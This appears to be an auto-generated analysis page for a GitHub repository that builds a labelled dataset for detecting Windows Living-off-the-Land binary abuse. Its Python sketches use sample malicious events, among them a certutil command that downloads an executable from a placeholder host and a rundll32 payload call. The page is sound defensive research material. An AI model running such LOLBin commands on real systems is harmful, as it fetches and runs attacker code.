Analysis updated 2026-05-18
Train a machine learning model to detect Windows LOLBin abuse using the pre-built labelled dataset from Zenodo
Reproduce the full ten-million-row dataset from scratch using the generation scripts and verify the labelling methodology
Use the 55 extracted behavioral features as a starting point for a SIEM detection rule or anomaly model
Benchmark a new detection model on unseen LOLBin attack scenarios not present in the training data
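Benchmarking on unseen scenarios depends on a split where whole attack categories are withheld from training. The following is a minimal sketch of such a split, not the repository's own method. The field names `technique_id` and `label`, the helper `split_by_technique`, and the sample events are illustrative assumptions, and the real dataset schema may differ.

```python
def split_by_technique(events, held_out, benign_test_every=5):
    """Send held-out techniques to the test set only.

    `technique_id` is a hypothetical field name; benign events are assumed
    to carry no technique (None).
    """
    held_out = set(held_out)
    train, test = [], []
    benign_seen = 0
    for event in events:
        technique = event.get("technique_id")
        if technique is None:
            # Benign event: route every n-th one to the test set so the
            # benchmark still contains normal activity.
            benign_seen += 1
            target = test if benign_seen % benign_test_every == 0 else train
        elif technique in held_out:
            # Malicious event from a withheld technique: test set only.
            target = test
        else:
            target = train
        target.append(event)
    return train, test


# Made-up sample events for illustration only.
events = [
    {"command_line": "certutil.exe -urlcache -f http://example.test/a.exe a.exe",
     "technique_id": "T1105", "label": 1},
    {"command_line": "rundll32.exe payload.dll,Start",
     "technique_id": "T1218.011", "label": 1},
    {"command_line": "certutil.exe -verify cert.cer",
     "technique_id": None, "label": 0},
    {"command_line": "rundll32.exe shell32.dll,Control_RunDLL",
     "technique_id": None, "label": 0},
]

train, test = split_by_technique(events, held_out={"T1218.011"}, benign_test_every=2)
```

Splitting by technique rather than by random row keeps near-duplicate command lines from the same attack category out of both sides of the split, which would otherwise inflate the measured accuracy.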
| | daniyyell-dev/winlolbin-gt-dataset | 0-bingwu-0/live-interpreter | 0xkaz/llm-governance-dashboard |
|---|---|---|---|
| Stars | 2 | 2 | 2 |
| Language | Python | Python | Python |
| Setup difficulty | moderate | moderate | hard |
| Complexity | 3/5 | 2/5 | 4/5 |
| Audience | researcher | general | ops devops |
Figures from each repo's GitHub metadata at analysis time.
Dataset files are on Zenodo, not in this repo. Generating the dataset from scratch also requires the LOLBAS catalog and the libLOL command library.
WinLOLBIN-GT is a labelled dataset for training machine learning models to detect Living Off the Land attacks on Windows. In this technique, an attacker carries out malicious actions with tools that ship with the operating system instead of installing separate malware. Because these are legitimate system tools, traditional security software has a harder time flagging them.
The dataset contains ten million labelled events: five million that represent normal administrative use of these Windows tools, and five million that represent malicious use patterns drawn from known attack procedures. Each event resembles a realistic process execution record, including the command line, the parent process, file paths, user context, and a MITRE ATT&CK technique identifier that labels the attack category. A model trained on this dataset reached 99 percent accuracy on attack scenarios it had never seen.
The repository contains four Python scripts. The first generates the raw ten-million-row dataset by simulating events from the LOLBAS catalog, a public list of Windows binaries that attackers commonly abuse, and from Red Canary's Atomic Red Team attack procedures. The second processes the raw data, extracts 55 behavioral features per event, and removes fields that would leak ground-truth labels into model training.
The finished dataset is hosted separately on Zenodo and is not stored in this repository. The generation scripts are licensed under MIT. The dataset files on Zenodo are released under Creative Commons BY 4.0, which requires attribution when you use them.
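The processing step described above (feature extraction followed by removal of label-leaking fields) can be pictured with a small sketch. This is an illustration under stated assumptions, not the repository's code: the four features, the field names (`command_line`, `parent_process`, `technique_id`, `scenario_name`, `label`), and the helper names are hypothetical and are not taken from the actual 55-feature schema.

```python
import math
from collections import Counter

# Hypothetical fields that would reveal the ground truth to a model.
LEAKY_FIELDS = {"technique_id", "scenario_name"}
# Hypothetical list of parent processes treated as suspicious launchers.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def shannon_entropy(text):
    """Character-level Shannon entropy in bits; 0.0 for an empty string."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def drop_leaky_fields(event):
    """Return a copy of the event without label-leaking fields."""
    return {k: v for k, v in event.items() if k not in LEAKY_FIELDS}


def extract_features(event):
    """Derive a few illustrative behavioral features from one event."""
    cmd = event.get("command_line", "")
    lowered = cmd.lower()
    parent = event.get("parent_process", "").lower()
    return {
        "cmd_length": len(cmd),
        "cmd_entropy": shannon_entropy(cmd),
        "has_url": int("http://" in lowered or "https://" in lowered),
        "parent_is_office": int(parent in OFFICE_PARENTS),
    }


def prepare_row(event):
    """Build a training row: features plus label, with leaky fields removed."""
    clean = drop_leaky_fields(event)
    row = extract_features(clean)
    row["label"] = clean["label"]
    return row


# Made-up sample event for illustration only.
sample = {
    "command_line": "certutil.exe -urlcache -f http://example.test/a.exe a.exe",
    "parent_process": "WINWORD.EXE",
    "technique_id": "T1105",
    "scenario_name": "demo",
    "label": 1,
}
row = prepare_row(sample)
```

Dropping the technique identifier before feature extraction matters because only malicious events carry one in this sketch, so a model could otherwise learn the label from that field alone.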
A ten-million-row labelled dataset and Python scripts for training ML models to detect Windows Living-Off-the-Land binary abuse, split evenly between benign and malicious process events.
Mainly Python.
The scripts are MIT licensed. The dataset files on Zenodo are released under Creative Commons BY 4.0, which requires attribution when used.
Setup difficulty is rated moderate, with roughly 30 minutes to a first successful run.
Mainly researchers.
Verify against the repo before relying on details.